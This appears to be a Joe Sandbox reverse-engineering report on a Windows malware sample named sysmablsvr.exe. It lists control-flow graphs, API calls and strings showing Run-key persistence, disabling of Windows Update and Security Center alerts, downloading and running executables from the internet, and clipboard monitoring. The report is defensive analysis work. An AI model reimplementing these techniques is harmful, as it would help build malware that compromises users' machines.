                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                              • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindsocket
                                              • String ID:
                                              • API String ID: 3943618503-0
                                              • Opcode ID: 7920f1fa20b97f550be2e13ac393b81d85ae9c1e65d5af07afafdd8883ae4a63
                                              • Instruction ID: d62f3833751a539e27b625c66b0fe154f308ce322b9d6d34e226f7a30690eb36
                                              • Opcode Fuzzy Hash: 7920f1fa20b97f550be2e13ac393b81d85ae9c1e65d5af07afafdd8883ae4a63
                                              • Instruction Fuzzy Hash: 5C118974A40710AFE360DF749C0AF877AE0AF04B54F50892DF599E72E1E3F49544879A
                                              APIs
                                              • CryptAcquireContextW.ADVAPI32(00407FCF,00000000,00000000,00000001,F0000040,?,?,0040C469,00407FCF,00000004,?,?,0040C49E,000000FF), ref: 0040C423
                                              • CryptGenRandom.ADVAPI32(00407FCF,?,00000000,?,?,0040C469,00407FCF,00000004,?,?,0040C49E,000000FF), ref: 0040C439
                                              • CryptReleaseContext.ADVAPI32(00407FCF,00000000,?,?,0040C469,00407FCF,00000004,?,?,0040C49E,000000FF), ref: 0040C445
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                              • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Crypt$Context$AcquireRandomRelease
                                              • String ID:
                                              • API String ID: 1815803762-0
                                              • Opcode ID: 115afb25b1a51c25259045811286537a4a8d93f4d7ebd8fa37951325938a193c
                                              • Instruction ID: 6943664ffc8d3a105bd4ceed40135057dfa4a41f6174007770034458561b6d1a
                                              • Opcode Fuzzy Hash: 115afb25b1a51c25259045811286537a4a8d93f4d7ebd8fa37951325938a193c
                                              • Instruction Fuzzy Hash: 0BE01275650208BBDB24CFD5EC49FDA776CEB48700F104154F70997190DAB5EA4097A9

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 0 407500-407534 Sleep CreateMutexA GetLastError 1 407536-407538 ExitProcess 0->1 2 40753e-4075dd GetModuleFileNameW PathFindFileNameW wsprintfW DeleteFileW ExpandEnvironmentStringsW wcscmp 0->2 3 4075e3-4075ee call 40ecc0 2->3 4 4078a9-4078d4 Sleep RegOpenKeyExW 2->4 11 4075f0-4075f2 ExitProcess 3->11 12 4075f8-407646 ExpandEnvironmentStringsW wsprintfW CopyFileW 3->12 6 407902-407922 RegOpenKeyExW 4->6 7 4078d6-4078fc RegSetValueExA RegCloseKey 4->7 9 407950-407970 RegOpenKeyExW 6->9 10 407924-40794a RegSetValueExA RegCloseKey 6->10 7->6 13 407972-407998 RegSetValueExA RegCloseKey 9->13 14 40799e-4079be RegOpenKeyExW 9->14 10->9 15 40764c-40767b SetFileAttributesW RegOpenKeyExW 12->15 16 4076de-407720 Sleep wsprintfW CopyFileW 12->16 13->14 17 4079c0-4079e6 RegSetValueExA RegCloseKey 14->17 18 4079ec-407a0c RegOpenKeyExW 14->18 15->16 21 40767d-4076b0 wcslen RegSetValueExW 15->21 22 407726-407755 SetFileAttributesW RegOpenKeyExW 16->22 23 4077b8-407811 Sleep ExpandEnvironmentStringsW wsprintfW CopyFileW 16->23 17->18 19 407a0e-407a3a RegSetValueExA RegCloseKey 18->19 20 407a3f-407a5f RegOpenKeyExW 18->20 24 407ae4-407b04 RegOpenKeyExW 19->24 26 407a61-407a90 RegCreateKeyExW RegCloseKey 20->26 27 407a96-407ab6 RegOpenKeyExW 20->27 21->16 28 4076b2-4076d4 RegCloseKey call 40ef10 21->28 22->23 29 407757-40778a wcslen RegSetValueExW 22->29 23->4 25 407817-407846 SetFileAttributesW RegOpenKeyExW 23->25 32 407b06-407b32 RegSetValueExA RegCloseKey 24->32 33 407b37-407b57 RegOpenKeyExW 24->33 25->4 30 407848-40787b wcslen RegSetValueExW 25->30 26->27 27->24 31 407ab8-407ade RegSetValueExA RegCloseKey 27->31 28->16 43 4076d6-4076d8 ExitProcess 28->43 29->23 35 40778c-4077ae RegCloseKey call 40ef10 29->35 30->4 36 40787d-40789f RegCloseKey call 40ef10 30->36 31->24 37 407c33-407c53 RegOpenKeyExW 32->37 39 407b59-407b88 RegCreateKeyExW RegCloseKey 33->39 40 407b8e-407bae RegOpenKeyExW 33->40 35->23 49 4077b0-4077b2 ExitProcess 35->49 36->4 56 4078a1-4078a3 ExitProcess 36->56 46 407c81-407ca1 RegOpenKeyExW 37->46 47 407c55-407c7b RegSetValueExA RegCloseKey 37->47 39->40 44 407bb0-407bdf RegCreateKeyExW RegCloseKey 40->44 45 407be5-407c05 RegOpenKeyExW 40->45 44->45 45->37 53 407c07-407c2d RegSetValueExA RegCloseKey 45->53 50 407ca3-407cc9 RegSetValueExA RegCloseKey 46->50 51 407ccf-407cef RegOpenKeyExA 46->51 47->46 50->51 54 407cf5-407dd5 RegSetValueExA * 7 RegCloseKey 51->54 55 407ddb-407dfb RegOpenKeyExA 51->55 53->37 54->55 57 407e01-407ee1 RegSetValueExA * 7 RegCloseKey 55->57 58 407ee7-407efc Sleep call 40cd60 55->58 57->58 61 408071-40807a 58->61 62 407f02-40805a WSAStartup wsprintfW * 2 CreateThread Sleep CreateThread Sleep CreateThread Sleep call 405b60 call 40dbd0 call 406f70 CreateEventA call 40c490 call 40d6c0 call 40b850 call 40d6f0 * 4 call 40d860 58->62 86 40805f-40806e call 40d9a0 62->86 86->61
                                              APIs
                                              • Sleep.KERNEL32(000007D0), ref: 0040750E
                                              • CreateMutexA.KERNEL32(00000000,00000000,55a4er5wo), ref: 0040751D
                                              • GetLastError.KERNEL32 ref: 00407529
                                              • ExitProcess.KERNEL32 ref: 00407538
                                              • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\sysmablsvr.exe,00000105), ref: 00407572
                                              • PathFindFileNameW.SHLWAPI(C:\Windows\sysmablsvr.exe), ref: 0040757D
                                              • wsprintfW.USER32 ref: 0040759A
                                              • DeleteFileW.KERNEL32(?), ref: 004075AA
                                              • ExpandEnvironmentStringsW.KERNEL32(%userprofile%,?,00000104), ref: 004075C1
                                              • wcscmp.NTDLL ref: 004075D3
                                              • ExitProcess.KERNEL32 ref: 004075F2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                              • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$ExitNameProcess$CreateDeleteEnvironmentErrorExpandFindLastModuleMutexPathSleepStringswcscmpwsprintf
                                              • String ID: %s:Zone.Identifier$%s\%s$%s\%s$%s\%s$%s\tbtcmds.dat$%s\tbtnds.dat$%temp%$%userprofile%$%windir%$55a4er5wo$AntiSpywareOverride$AntiSpywareOverride$AntiVirusDisableNotify$AntiVirusDisableNotify$AntiVirusOverride$AntiVirusOverride$C:\Users\user\tbtcmds.dat$C:\Users\user\tbtnds.dat$C:\Windows\sysmablsvr.exe$CheckedValue$DisableWindowsUpdateAccess$DisableWindowsUpdateAccess$FirewallDisableNotify$FirewallDisableNotify$FirewallOverride$FirewallOverride$NoAutoUpdate$NoAutoUpdate$SOFTWARE\Microsoft\Security Center$SOFTWARE\Microsoft\Security Center\Svc$SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL$SOFTWARE\Policies\Microsoft\Windows$SOFTWARE\Policies\Microsoft\Windows$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU$SYSTEM\CurrentControlSet\Services\BITS$SYSTEM\CurrentControlSet\Services\DoSvc$SYSTEM\CurrentControlSet\Services\UsoSvc$SYSTEM\CurrentControlSet\Services\WaaSMedicSvc$SYSTEM\CurrentControlSet\Services\wuauserv$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Start$Start$Start$Start$Start$UpdatesDisableNotify$UpdatesDisableNotify$UpdatesOverride$UpdatesOverride$Windows Settings$WindowsUpdate$WindowsUpdate$sysmablsvr.exe
                                              • API String ID: 4172876685-1943688019
                                              • Opcode ID: e8792de07db31feacb4225683fdc67bc03523796b4c41c4f0dd09e2c170d2514
                                              • Instruction ID: a49710c48774a039d08af1d560b2319e957ec07716638a9d0d735a0d257e6f0f
                                              • Opcode Fuzzy Hash: e8792de07db31feacb4225683fdc67bc03523796b4c41c4f0dd09e2c170d2514
                                              • Instruction Fuzzy Hash: 9B5268B1B80318BBE7209B60DC4AFD93779AB48B11F1085A5F305B91D0DAF5A984CB5D

                                              Control-flow Graph

                                              APIs
                                              • GetTickCount.KERNEL32 ref: 0040F079
                                              • srand.MSVCRT ref: 0040F080
                                              • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 0040F0A0
                                              • strlen.NTDLL ref: 0040F0AA
                                              • mbstowcs.NTDLL ref: 0040F0C1
                                              • rand.MSVCRT ref: 0040F0C9
                                              • rand.MSVCRT ref: 0040F0DD
                                              • wsprintfW.USER32 ref: 0040F104
                                              • InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36,00000000,00000000,00000000,00000000), ref: 0040F11A
                                              • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040F149
                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040F178
                                              • InternetReadFile.WININET(00000000,?,00000103,?), ref: 0040F1AB
                                              • WriteFile.KERNEL32(000000FF,?,00000000,?,00000000), ref: 0040F1DC
                                              • CloseHandle.KERNEL32(000000FF), ref: 0040F1EB
                                              • wsprintfW.USER32 ref: 0040F204
                                              • DeleteFileW.KERNEL32(?), ref: 0040F214
                                              • Sleep.KERNEL32(000003E8), ref: 0040F21F
                                              • Sleep.KERNEL32(000007D0), ref: 0040F240
                                              • ExitProcess.KERNEL32 ref: 0040F268
                                              • DeleteFileW.KERNEL32(?), ref: 0040F27E
                                              • CloseHandle.KERNEL32(000000FF), ref: 0040F28B
                                              • InternetCloseHandle.WININET(00000000), ref: 0040F298
                                              • InternetCloseHandle.WININET(00000000), ref: 0040F2A5
                                              • Sleep.KERNEL32(000003E8), ref: 0040F2B0
                                              • rand.MSVCRT ref: 0040F2C5
                                              • Sleep.KERNEL32 ref: 0040F2DC
                                              • rand.MSVCRT ref: 0040F2E2
                                              • rand.MSVCRT ref: 0040F2F6
                                              • wsprintfW.USER32 ref: 0040F31D
                                              • DeleteUrlCacheEntryW.WININET(?), ref: 0040F32D
                                              • URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 0040F347
                                              • wsprintfW.USER32 ref: 0040F367
                                              • DeleteFileW.KERNEL32(?), ref: 0040F377
                                              • Sleep.KERNEL32(000003E8), ref: 0040F382
                                              • Sleep.KERNEL32(000007D0), ref: 0040F3A3
                                              • ExitProcess.KERNEL32 ref: 0040F3CA
                                              • DeleteFileW.KERNEL32(?), ref: 0040F3D9
                                              Strings
                                              • %s\%d%d.exe, xrefs: 0040F0F8
                                              • %s:Zone.Identifier, xrefs: 0040F1F8
                                              • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36, xrefs: 0040F115
                                              • %temp%, xrefs: 0040F09B
                                              • %s\%d%d.exe, xrefs: 0040F311
                                              • %s:Zone.Identifier, xrefs: 0040F35B
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                              • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$Sleep$DeleteInternetrand$CloseHandlewsprintf$ExitOpenProcess$CacheCountCreateDownloadEntryEnvironmentExpandReadStringsTickWritembstowcssrandstrlen
                                              • String ID: %s:Zone.Identifier$%s:Zone.Identifier$%s\%d%d.exe$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                              • API String ID: 3526668077-2417596247
                                              • Opcode ID: bcfd523ca2bd59dabc98687d20756347b5c017932b083f233573b856c8686c0d
                                              • Instruction ID: d1b69f2f4fd2238e53d437ba447cd35dd01203c47a8128eb559f47a2066d0ae0
                                              • Opcode Fuzzy Hash: bcfd523ca2bd59dabc98687d20756347b5c017932b083f233573b856c8686c0d
                                              • Instruction Fuzzy Hash: 7691CBB5940318ABE720DB60DC49FE93779AB88701F0484F9F609A51D1DBB99AD4CF28

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 121 40b430-40b447 call 40b360 124 40b449 121->124 125 40b44e-40b46a call 40afb0 strcmp 121->125 127 40b6d5-40b6d8 124->127 129 40b471-40b48d call 40afb0 strstr 125->129 130 40b46c 125->130 133 40b4d0-40b4ec call 40afb0 strstr 129->133 134 40b48f-40b4ab call 40afb0 strstr 129->134 130->127 139 40b4ee-40b50a call 40afb0 strstr 133->139 140 40b52f-40b54b call 40afb0 strstr 133->140 141 40b4cb 134->141 142 40b4ad-40b4c9 call 40afb0 strstr 134->142 149 40b52a 139->149 150 40b50c-40b528 call 40afb0 strstr 139->150 151 40b54d-40b569 call 40afb0 strstr 140->151 152 40b58e-40b5a4 EnterCriticalSection 140->152 141->127 142->133 142->141 149->127 150->140 150->149 163 40b589 151->163 164 40b56b-40b587 call 40afb0 strstr 151->164 153 40b5af-40b5b8 152->153 156 40b5e9-40b5f4 call 40b6e0 153->156 157 40b5ba-40b5ca 153->157 170 40b6ca-40b6cf LeaveCriticalSection 156->170 171 40b5fa-40b608 156->171 160 40b5e7 157->160 161 40b5cc-40b5e5 call 40da30 157->161 160->153 161->156 163->127 164->152 164->163 170->127 173 40b60a 171->173 174 40b60e-40b610 call 40a320 171->174 173->174 176 40b615-40b61f 174->176 176->170 177 40b625-40b642 call 40da30 176->177 180 40b644-40b654 177->180 181 40b69a-40b6b2 177->181 182 40b660-40b698 call 40a740 180->182 183 40b656-40b65e Sleep 180->183 184 40b6b8-40b6c3 call 40b6e0 181->184 182->184 183->180 184->170 189 40b6c5 call 40b110 184->189 189->170
                                              APIs
                                                • Part of subcall function 0040B360: gethostname.WS2_32(?,00000100), ref: 0040B37C
                                                • Part of subcall function 0040B360: gethostbyname.WS2_32(?), ref: 0040B38E
                                              • strcmp.NTDLL ref: 0040B460
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                              • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: gethostbynamegethostnamestrcmp
                                              • String ID: .10$.10.$.127$.127.$.192$.192.$0.0.0.0$10.$127.$192.
                                              • API String ID: 2906596889-2213908610
                                              • Opcode ID: d27b1e01b54477f86afe98856adb7ca23eb5c9f208e924790736f7c59111b262
                                              • Instruction ID: bd96892130d723efa302dbc8dbf9c53b9c7bf10ac090126f1a0951e43edd4a65
                                              • Opcode Fuzzy Hash: d27b1e01b54477f86afe98856adb7ca23eb5c9f208e924790736f7c59111b262
                                              • Instruction Fuzzy Hash: 0C6181B5A04205A7CB10AF61EC46AAB7774AB10308F14847AF805B73C2E73DE655C6DF

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 191 405910-405932 GetWindowLongW 192 405934-40593b 191->192 193 405956-40595d 191->193 194 405941-405945 192->194 195 4059c7-4059d8 IsClipboardFormatAvailable 192->195 196 405986-40598c 193->196 197 40595f 193->197 202 405964-405981 SetClipboardViewer SetWindowLongW 194->202 203 405947-40594b 194->203 200 4059e3-4059ed IsClipboardFormatAvailable 195->200 201 4059da-4059e1 195->201 198 4059a6-4059aa 196->198 199 40598e-4059a4 SetWindowLongW 196->199 204 405b44-405b5d DefWindowProcA 197->204 205 4059c2 198->205 206 4059ac-4059bc SendMessageA 198->206 199->205 208 4059f8-405a02 IsClipboardFormatAvailable 200->208 209 4059ef-4059f6 200->209 207 405a0b-405a0f 201->207 202->204 210 405951 203->210 211 405afd-405b3e RegisterRawInputDevices ChangeClipboardChain 203->211 205->204 206->205 213 405a15-405a1f OpenClipboard 207->213 214 405adf-405ae3 207->214 208->207 212 405a04 208->212 209->207 210->204 211->204 212->207 213->214 217 405a25-405a36 GetClipboardData 213->217 215 405ae5-405af5 SendMessageA 214->215 216 405afb 214->216 215->216 216->204 218 405a38 217->218 219 405a3d-405a4e GlobalLock 217->219 218->204 220 405a50 219->220 221 405a55-405a66 219->221 220->204 222 405a68-405a6c 221->222 223 405a89-405a9c call 405630 221->223 224 405a9e-405aae call 405750 222->224 225 405a6e-405a72 222->225 231 405ab1-405ac5 GlobalUnlock CloseClipboard 223->231 224->231 227 405a74 225->227 228 405a76-405a87 call 405510 225->228 227->231 228->231 231->214 235 405ac7-405adc call 4048a0 call 40a740 231->235 235->214
                                              APIs
                                              • GetWindowLongW.USER32(?,000000EB), ref: 0040591C
                                              • SetClipboardViewer.USER32(?), ref: 00405968
                                              • SetWindowLongW.USER32(?,000000EB,?), ref: 0040597B
                                              • IsClipboardFormatAvailable.USER32(0000000D), ref: 004059D0
                                              • OpenClipboard.USER32(00000000), ref: 00405A17
                                              • GetClipboardData.USER32(00000000), ref: 00405A29
                                              • RegisterRawInputDevices.USER32(?,00000001,0000000C), ref: 00405B30
                                              • ChangeClipboardChain.USER32(?,?), ref: 00405B3E
                                              • DefWindowProcA.USER32(?,?,?,?), ref: 00405B54
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                              • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Clipboard$Window$Long$AvailableChainChangeDataDevicesFormatInputOpenProcRegisterViewer
                                              • String ID:
                                              • API String ID: 3549449529-0
                                              • Opcode ID: ce536a5ebd17aa25bd8c63565adcaae9255b97c75774932fd7b0e60d3253294e
                                              • Instruction ID: 140c23de002baebc09e84a4b6840f2c6f62578de50faf7348504d1cb8e8204ab
                                              • Opcode Fuzzy Hash: ce536a5ebd17aa25bd8c63565adcaae9255b97c75774932fd7b0e60d3253294e
                                              • Instruction Fuzzy Hash: 80710C75A00608EFDF14DFA4D988BAFB7B4EB48300F10856AE506B7290D7799A40CF69

                                              Control-flow Graph

                                              APIs
                                              • Sleep.KERNEL32(000003E8), ref: 00406B5E
                                              • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\sysmablsvr.exe,00000104), ref: 00406B70
                                                • Part of subcall function 0040ED00: CreateFileW.KERNEL32(00406B80,80000000,00000001,00000000,00000003,00000000,00000000,00406B80), ref: 0040ED20
                                                • Part of subcall function 0040ED00: GetFileSize.KERNEL32(000000FF,00000000), ref: 0040ED35
                                                • Part of subcall function 0040ED00: CloseHandle.KERNEL32(000000FF), ref: 0040ED42
                                              • ExitThread.KERNEL32 ref: 00406CDA
                                                • Part of subcall function 00406340: GetLogicalDrives.KERNEL32 ref: 00406346
                                                • Part of subcall function 00406340: RegOpenKeyExW.KERNEL32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 00406394
                                                • Part of subcall function 00406340: RegQueryValueExW.KERNEL32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 004063C1
                                                • Part of subcall function 00406340: RegCloseKey.ADVAPI32(?), ref: 004063DE
                                              • Sleep.KERNEL32(000007D0), ref: 00406CCD
                                                • Part of subcall function 00406260: lstrcpyW.KERNEL32(?,?,?,?,00000019), ref: 004062B3
                                              • GetVolumeInformationW.KERNEL32(?,?,00000105,00000000,00000000,?,00000000,00000000), ref: 00406C0F
                                              • GetDiskFreeSpaceExW.KERNEL32(?,00000000,?,00000000), ref: 00406C24
                                              • _aulldiv.NTDLL(?,?,40000000,00000000), ref: 00406C3F
                                              • wsprintfW.USER32 ref: 00406C52
                                              • wsprintfW.USER32 ref: 00406C72
                                              • wsprintfW.USER32 ref: 00406C95
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                              • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Filewsprintf$CloseSleep$CreateDiskDrivesExitFreeHandleInformationLogicalModuleNameOpenQuerySizeSpaceThreadValueVolume_aulldivlstrcpy
                                              • String ID: (%dGB)$%s%s$C:\Windows\sysmablsvr.exe$Unnamed volume
                                              • API String ID: 1650488544-3576103414
                                              • Opcode ID: 28cf1d750f559b85cf67cfd50a9e6b26b5fb1b314e0712f8dd8363f24fb25f9f
                                              • Instruction ID: 6971fabc066a78c2b5f4f93c2536245faf55c75ef939042e540841f18162a7fc
                                              • Opcode Fuzzy Hash: 28cf1d750f559b85cf67cfd50a9e6b26b5fb1b314e0712f8dd8363f24fb25f9f
                                              • Instruction Fuzzy Hash: 1D419BB1900214BBE714DB94DD55FEE7778BB48700F1081A5F20AB61D0DA785794CF6A

                                              Control-flow Graph

                                              APIs
                                              • memset.NTDLL ref: 00405838
                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00405850
                                              • Sleep.KERNEL32(00000001), ref: 00405864
                                              • GetTickCount.KERNEL32 ref: 0040586A
                                              • GetTickCount.KERNEL32 ref: 00405873
                                              • wsprintfW.USER32 ref: 00405886
                                              • RegisterClassExW.USER32(00000030), ref: 00405893
                                              • CreateWindowExW.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,?,00000000), ref: 004058BC
                                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004058D7
                                              • TranslateMessage.USER32(?), ref: 004058E5
                                              • DispatchMessageA.USER32(?), ref: 004058EF
                                              • ExitThread.KERNEL32 ref: 00405901
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                              • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Message$CountTick$ClassCreateDispatchExitHandleModuleRegisterSleepThreadTranslateWindowmemsetwsprintf
                                              • String ID: %x%X$0
                                              • API String ID: 716646876-225668902
                                              • Opcode ID: 0ae848275c23e009fdd4c42bfca4f986060bd914b3fa7c2793bcea76a610d9bf
                                              • Instruction ID: 26b7d68298067a6ce37e9ddfddb25a36523320ae21639d5819629e884720d218
                                              • Opcode Fuzzy Hash: 0ae848275c23e009fdd4c42bfca4f986060bd914b3fa7c2793bcea76a610d9bf
                                              • Instruction Fuzzy Hash: 47212C71940308BBEB10ABA0DC49FEE7B78EB04711F108439F606BA1D0DBB995948F69

                                              Control-flow Graph

                                              control_flow_graph 270 40ed50-40ed8f CreateFileW 271 40ed95-40edb0 CreateFileMappingW 270->271 272 40eeaa-40eeae 270->272 273 40eea0-40eea4 CloseHandle 271->273 274 40edb6-40edcf MapViewOfFile 271->274 275 40eeb0-40eed0 CreateFileW 272->275 276 40ef04-40ef0a 272->276 273->272 277 40edd5-40edeb GetFileSize 274->277 278 40ee96-40ee9a CloseHandle 274->278 279 40eed2-40eef2 WriteFile CloseHandle 275->279 280 40eef8-40ef01 call 40a740 275->280 281 40edf1-40ee04 call 40cd80 277->281 282 40ee8c-40ee90 UnmapViewOfFile 277->282 278->273 279->280 280->276 281->282 287 40ee0a-40ee19 281->287 282->278 287->282 288 40ee1b-40ee3b call 40c720 287->288 290 40ee40-40ee4a 288->290 290->282 291 40ee4c-40ee77 call 40aa70 memcmp 290->291 291->282 294 40ee79-40ee85 call 40a740 291->294 294->282
                                              APIs
                                              • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040ED82
                                              • CreateFileMappingW.KERNELBASE(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040EDA3
                                              • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040EDC2
                                              • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040EDDB
                                              • memcmp.NTDLL ref: 0040EE6D
                                              • UnmapViewOfFile.KERNEL32(00000000), ref: 0040EE90
                                              • CloseHandle.KERNEL32(00000000), ref: 0040EE9A
                                              • CloseHandle.KERNEL32(000000FF), ref: 0040EEA4
                                              • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040EEC3
                                              • WriteFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 0040EEE8
                                              • CloseHandle.KERNEL32(000000FF), ref: 0040EEF2
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                              • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
